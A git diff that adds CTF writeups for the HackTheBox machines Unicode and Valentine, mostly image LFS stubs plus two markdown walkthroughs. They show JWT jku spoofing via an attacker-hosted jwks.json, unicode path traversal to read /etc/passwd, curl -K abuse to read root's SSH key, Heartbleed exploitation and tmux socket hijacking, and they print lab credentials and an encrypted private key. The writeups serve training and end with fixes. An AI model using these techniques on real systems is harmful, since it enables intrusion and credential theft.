b/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c03e1f0ef1b66ae13c5fb1adad147e4d3507dcd0a9983e586340044cd1627f1d +size 29608 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-9.png b/content/writeup-ctf/writeup-unicode-htb/img/image-9.png new file mode 100644 index 0000000..9d320a2 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f62a01de7f9328e336bdf2ad03b381542194d03be2d159f9d9166b767c882d7 +size 277841 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp new file mode 100644 index 0000000..0914410 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5b838c3796fea279b61d6eb1f1078bbb0cc240689c93603051ff64812829787 +size 162568 diff --git a/content/writeup-ctf/writeup-unicode-htb/index.md b/content/writeup-ctf/writeup-unicode-htb/index.md new file mode 100644 index 0000000..e8cdec4 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/index.md @@ -0,0 +1,235 @@ +--- +title: "Writeup - Unicode (HTB)" +date: 2022-05-07 +slug: "writeup-unicode-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Unicode](https://app.hackthebox.com/machines/Unicode) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.126 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +Let's start by creating an account on the site. + +![](img/image-3.webp) + +After logging in, you will be taken to the page. + +![](img/image-4.webp) + +By searching a bit you can find a lot of forms, file sending, ... But after having tested them I don't find anything conclusive. + +![](img/image-5.webp) + +![](img/image-6.webp) + +Looking at the cookies generated by the site, I find one: `auth` I try to decode it on JWT.io. + +![](img/image-7.webp) + +So it's a JWT cookie with the RS256 algorithm. I search on google for documentation on this type of cookie and see if there are any exploit. I quickly find the following site: [JWT - JSON Web Tokens](https://hackernoon.com/json-web-tokens-jwt-demystified-f7e202249640). + +In this article we learn that this string is composed of 3 parts encoded in base 64 : + +![](img/image-8.webp) + +- Header: Parameter such as the algorithm, the url of the JSON web key, ... +- Payload: Personalized storage area, in our case the username +- Signature : Hash of the Header+Payload + +We also learn that in the majority of the cases we use asymmetric keys and that in this case the site must host a `jwks` file with the `keys` properties. I can get the content of this file with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ curl hackmedia.htb/static/jwks.json +{ + "keys": [ + { + "kty": "RSA", + "use": "sig", + "kid": "hackthebox", + "alg": "RS256", + "n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs", + "e": "AQAB" + } + ] +} +``` +At the end of the article we learn one last thing, in general this element is stored in the `header` of the page. But in our case it is in the form of a `cookie`. + +To change the account for the admin account, we will try to do a `JWKS Spoofing`. To do this we will first generate a key pair following the same parameters as the `jwks.json` file we found. For that I use the following site [mkjwk](https://mkjwk.org/). + +![](img/image-9.webp) + +I then create a `jwks.json` file with the same structure as the previous one but with the `n` we just generated. + + +```bash +{ + "keys": [ + { + "kty": "RSA", + "use": "sig", + "kid": "hackthebox", + "alg": "RS256", + "n": "[CHANGE IT]", + "e": "AQAB" + } + ] +} +``` +I then launch a file server with the following command: + + +```bash +python3 -m http.server 80 +``` +Then I start to modify our cookie. First I change the value of `jku` and add the following element: + + +```bash +/../redirect?url=10.10.14.4/jwks.json +``` +Then I add in the `Verify Signature` part the Public/Private key that we have generated. + +Finally I change the variable `user` with the value `admin`. + +![](img/image-10.webp) + +Now that we have our new cookie, I replace the old value with the new one, then refresh the page. I now have access to the admin interface! + +![](img/image-11.webp) + +I look a little at the different parge, I fall on the following link: + + + +It's a link that has an argument, so we should be able to do a Path Traversal exploit. So I try in a first time the following input: + + +```bash +../../../etc/passwd +``` +But unfortunately this results in an error... There is a check that blocks our request. After some research it is known that it is possible to bypass this filtering with a particular encoding of the characters. Thanks to the unicode normalization it is possible to pass the request: + +[Unicode normalization vulnerabilities](https://lazarv.com/posts/unicode-normalization-vulnerabilities/) + +With the following query I can access the file : + + +```bash +︰/︰/︰/︰/︰/︰/︰/etc/passwd +``` +In this file I learn that the `mysql` service is used. Potentially credentials ! + + +```bash +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin +systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin +systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin +messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin +tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false +uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin +tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin +landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin +pollinate:x:110:1::/var/cache/pollinate:/bin/false +usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin +sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd- +coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin +lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false +mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false +code:x:1000:1000:,,,:/home/code:/bin/bash +``` +I then look in the configuration files of nginx, which allows me to find the following file: + + +```bash +mysql_host: "localhost" +mysql_user: "code" +mysql_password: "B3stC0d3r2021@@!" +mysql_db: "user" +``` +I then try to connect with these credentials: + +![](img/image-12.webp) + +I now have a shell as `code` and I can get the first flag. + +## Privilege escalation + +First I look at the sudo permissions I have: + +![](img/image-13.webp) + +I have the right to run the treport `treport` script as root, so I try to run it to see what it does: + +![](img/image-14.webp) + +This script allows to manage files. One option interests me particularly: `Download A Threat Report`. Indeed after having executed it, we can clearly see that the program uses `curl`. So I try to download a local file to see what happens: + +![](img/image-15.webp) + +An error, so there is potentially a validation of the URL... So I look at the doc of the command to see if there is an option that could be useful. + + +```bash +[...] +-K, --config + +Specify a text file to read curl arguments from. The command line arguments found in the text file will be used as if they were provided on the command line. +[...] +``` +After a few minutes I find the option `-K`, this option allows to specify a file in which `curl` will go to look for the links to download files. I can try to use this option to see the content of the file... + +![](img/image-16.webp) + +By trying on the id\_rsa file of the root use, I can visualize its content ! So I try to create a local file with the RSA key and then connect via SSH to the root user but without success :( + +To validate the machine, I still look at the content of the `root.txt` file. + +![](img/image-17.webp) + +So I get the last flag, but I didn't get a root shell yet. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update the panel to avoid Paht Traversal +- Do not let any program run in root if not necessary diff --git a/content/writeup-ctf/writeup-valentine-htb/featured.png b/content/writeup-ctf/writeup-valentine-htb/featured.png new file mode 100644 index 0000000..cb7316b --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3539d224b2ae4c9faf16e7eefbd5db5288f915caa11b66c1d0b328cd3da03770 +size 269289 diff --git a/content/writeup-ctf/writeup-valentine-htb/featured.webp b/content/writeup-ctf/writeup-valentine-htb/featured.webp new file mode 100644 index 0000000..0bbaea7 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c5bf51d71dd8a680ac73eed3458fdaae437cea2e8dff3630d548f726814ece1 +size 28084 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-1.png b/content/writeup-ctf/writeup-valentine-htb/img/image-1.png new file mode 100644 index 0000000..b7c3bd9 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68ff38a461c79681e15401af96454c580f030ae3968da880edf1e23b7b2321f6 +size 39360 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp new file mode 100644 index 0000000..9452887 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3c997ba457eea7ffb04774bea53ca0d01134c307de07b251fbf66906ac0d5c1 +size 33826 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-2.png b/content/writeup-ctf/writeup-valentine-htb/img/image-2.png new file mode 100644 index 0000000..89d484d --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:645689ba3762229e3ac3b0ee77c6a30df680477e1a90851dea4e8ab17c717e61 +size 895817 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp new file mode 100644 index 0000000..e11189f --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10a0d0918ba5ff2534ceb909db11e33865f5ecfc32a83512529232f501c4bbad +size 150720 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-3.png b/content/writeup-ctf/writeup-valentine-htb/img/image-3.png new file mode 100644 index 0000000..599c535 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0fc9f22b78bebc77dafee88d95e4ded010e95e86289d7b21672994d5f1798ed +size 32583 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp new file mode 100644 index 0000000..93dee62 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29aae3eb38d08045a2218f06365d920f919a878a93c660a9dc8cd8947c3e9c18 +size 31426 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-4.png b/content/writeup-ctf/writeup-valentine-htb/img/image-4.png new file mode 100644 index 0000000..f0d5bf4 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c23170c73c1e11440241b2d14e8a9cfe6f3331f9285c54e3886dad92722d77fb +size 59010 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp new file mode 100644 index 0000000..d401eab --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83905310fc201e2f000c442386a002dc6ee81330b9bf2c6bb284913c1157a8ea +size 108770 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-5.png b/content/writeup-ctf/writeup-valentine-htb/img/image-5.png new file mode 100644 index 0000000..404e517 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a31fde59951663b4c54c0aba4d9496f0c393a54f155bade30f8ac8271ac0913 +size 27909 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp new file mode 100644 index 0000000..24a9927 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5bf95abcf51df1fec5c201907d013cb229a5e25fe0eef0f3b09f76b8f783fe15 +size 24544 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-6.png b/content/writeup-ctf/writeup-valentine-htb/img/image-6.png new file mode 100644 index 0000000..0df870a --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:575bc2165086ffdb3098d3e9046ee6f5eba249b2c768aafbe7136150fd578143 +size 23837 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp new file mode 100644 index 0000000..e23e917 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53ed2715272b57adf75fbf3a3ba2bdb7c33a2a5be90059a5c06cf44b24a24d60 +size 24224 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-7.png b/content/writeup-ctf/writeup-valentine-htb/img/image-7.png new file mode 100644 index 0000000..de9c5e5 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8d5e71b66aceeac99eb0cb00d88bec1947966671d57cb5cd7183af37b4136b7 +size 6645 diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp new file mode 100644 index 0000000..dcd5db7 --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:929717789379635d89b5e33a89d00233098ebd8c52d6ba51463b6afefd8658cd +size 7834 diff --git a/content/writeup-ctf/writeup-valentine-htb/index.md b/content/writeup-ctf/writeup-valentine-htb/index.md new file mode 100644 index 0000000..82c756a --- /dev/null +++ b/content/writeup-ctf/writeup-valentine-htb/index.md @@ -0,0 +1,132 @@ +--- +title: "Writeup - Valentine (HTB)" +date: 2022-05-05 +slug: "writeup-valentine-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Valentine](https://app.hackthebox.com/machines/Valentine) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.79 +``` +Three TCP port are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 5.9p1) +- 80/tcp : HTTP (Apache 2.2.22) +- 443/tcp : HTTPS (Apache 2.2.22) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the site's folders. + +I quickly find the `/dev` folder where there are 2 files : + + +```bash +To do: + +1) Coffee. +2) Research. +3) Fix decoder/encoder before going live. +4) Make sure encoding/decoding is only done client-side. +5) Don't use the decoder/encoder until any of this is done. +6) Find a better way to take notes. +``` + +```bash +-----BEGIN RSA PRIVATE KEY----- +Proc-Type: 4,ENCRYPTED +DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46 + +DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R +5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6 +0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi +Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P +OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd +pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH +QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E +p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC +Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO +t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5 +XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK +aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ ++wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E +AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q +r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe +2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky +e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP +09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC +dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX +cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY +pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj +Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL +suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW +l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT +RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3 +-----END RSA PRIVATE KEY----- +``` +This second file is very interesting, it's an RSA key that should allow me to connect in SSH. The only problem is that it is encrypted and requires a password. So I try to brute force the password. For that I start by extracting a hash with the following command: + + +```bash +ssh2john id_rsa > hash +``` +Then I launch John with the rockyou dictionary. + +![](img/image-3.webp) + +Unfortunately without success. Let's look for something else, after performing a vulnerability scan with Nmap, I find that the machine is vulnerable to CVE-2014-0160. After some research I find this github [github](https://github.com/sensepost/heartbleed-poc). + +![](img/image-4.webp) + +After some executions I find a string in base64: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d +heartbleedbelievethehype +``` +It could be a password, so I test to connect with : + +![](img/image-5.webp) + +I now have SSH access and can retrieve the first flag. + +{{< alert >}} +While trying to connect via SSH I got the following error: `sign_and_send_pubkey: no mutual signature supported`. To solve the problem I had to add to the command: `PubkeyAcceptedKeyTypes=+ssh-rsa`. +{{< /alert >}} + +## Privilege escalation + +At first I start by running the [linpeas.sh](https://linpeas.sh) script to find a vulnerability. I quickly find a tmux service executed by root. + +![](img/image-6.webp) + +After some research I find that it is possible to enter a tmux stream via the `-S` argument which allows to indicate a socket-path. + + +```bash +tmux -S /.devs/dev_sess +``` +I now have a root shell and I can get the last flag. + +![](img/image-7.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave large files accessible directly from a website +- Update the machine to fix CVE-2014-0160 +- Do not create a tmux session as root diff --git a/content/writeup-ctf/writeup-watcher-thm/featured.png b/content/writeup-ctf/writeup-watcher-thm/featured.png new file mode 100644 index 0000000..f383377 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f15c28db1b5cb1bd581b2940cdc0760b779d7d1b2501743b3eacca3bf15f9ec +size 135190 diff --git a/content/writeup-ctf/writeup-watcher-thm/featured.webp b/content/writeup-ctf/writeup-watcher-thm/featured.webp new file mode 100644 index 0000000..94cc08c --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40a9900a5716a04f308a355321c3bb05731555f3f0ce68cf9297dadbc4b3a5ca +size 87760 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-1.png b/content/writeup-ctf/writeup-watcher-thm/img/image-1.png new file mode 100644 index 0000000..ac84516 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df357b9331975320a0dde865aa758d73431f76dd63e78ecaa4de23fc442da1d2 +size 37917 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp new file mode 100644 index 0000000..956292f --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9921783a3a3d05ff7e8f1795a879ba2d69cda35f7ec3fa142445854f12166185 +size 38436 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-10.png b/content/writeup-ctf/writeup-watcher-thm/img/image-10.png new file mode 100644 index 0000000..b668edd --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c05e13a8806a6e7ddd69b7ad05119993bb36acec7d5812b306207a941a4ef87d +size 14191 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp new file mode 100644 index 0000000..d9d655d --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aaf38f2520ba12e21fd904c02c1dad990672edc6a8f2c5e7d6888e59ae499bda +size 13826 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-11.png b/content/writeup-ctf/writeup-watcher-thm/img/image-11.png new file mode 100644 index 0000000..87cd61a --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d691649eb5701e6f7b65396d39b6965c0a32677de82f809229c33b6bba665329 +size 25007 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp new file mode 100644 index 0000000..65866aa --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82ecd66308978a2daee30bb87db92bea52e8c9f53997dfeb98088ddb99a862a8 +size 20096 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-12.png b/content/writeup-ctf/writeup-watcher-thm/img/image-12.png new file mode 100644 index 0000000..3c04dab --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d493080f655fd019add90db93d06d252991b18855188c841feba2d5f4fe8da5f +size 40873 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp new file mode 100644 index 0000000..0590d95 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1dad2a4bacb8eb056bf9f47a89e6b445c3faba35e5e5697975433c96fb33b83d +size 41934 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-2.png b/content/writeup-ctf/writeup-watcher-thm/img/image-2.png new file mode 100644 index 0000000..4cafb20 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73737325efbd8d8167d490448befbccd41033665894faf5805cdb3a80cc31a07 +size 63804 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp new file mode 100644 index 0000000..bb27a99 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06e4828cb3c654560bb6dbef36f1083f95e7100fc684167dc2eec7029b827952 +size 51490 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-3.png b/content/writeup-ctf/writeup-watcher-thm/img/image-3.png new file mode 100644 index 0000000..fd066e2 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73790ede23d7ac69f63ed97d187fa5d6c1b640cb980682629a07aab55082769c +size 122626 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp new file mode 100644 index 0000000..320fee0 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:866b7ec7b2a1164c4e875c5f38594d7f9c672d7d3834e8d3947cb897bca0f857 +size 106746 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-4.png b/content/writeup-ctf/writeup-watcher-thm/img/image-4.png new file mode 100644 index 0000000..466244c --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b54d59b3bc362ae368be87eba118647b4570648396e62d0187567ab33b846190 +size 25724 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp new file mode 100644 index 0000000..86780a7 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7787e4eaf5160656d2887fbaaf9b15e20d80af5dfa468fe9df28a6236a114d6 +size 25334 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-5.png b/content/writeup-ctf/writeup-watcher-thm/img/image-5.png new file mode 100644 index 0000000..235ca56 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3df4bbeb70d56b24372a6ae2d05841925172010f6caea40d891a3a3d71daf67 +size 29595 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp new file mode 100644 index 0000000..6bc30e6 --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7d4216a853b74d32aaadcc54b3ef69e1d0c5a0109f988bc2d0467481fc3953c +size 24612 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-6.png b/content/writeup-ctf/writeup-watcher-thm/img/image-6.png new file mode 100644 index 0000000..7690e7c --- /dev/null +++ b/content/writeup-ctf/writeup-watcher-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72c1eb5c7d5aa3bc08be1e689c8ce403929a5baa4055c6c18601271664ee147c +size 33149 diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp new file mode 100644 index 0000000..205e76f 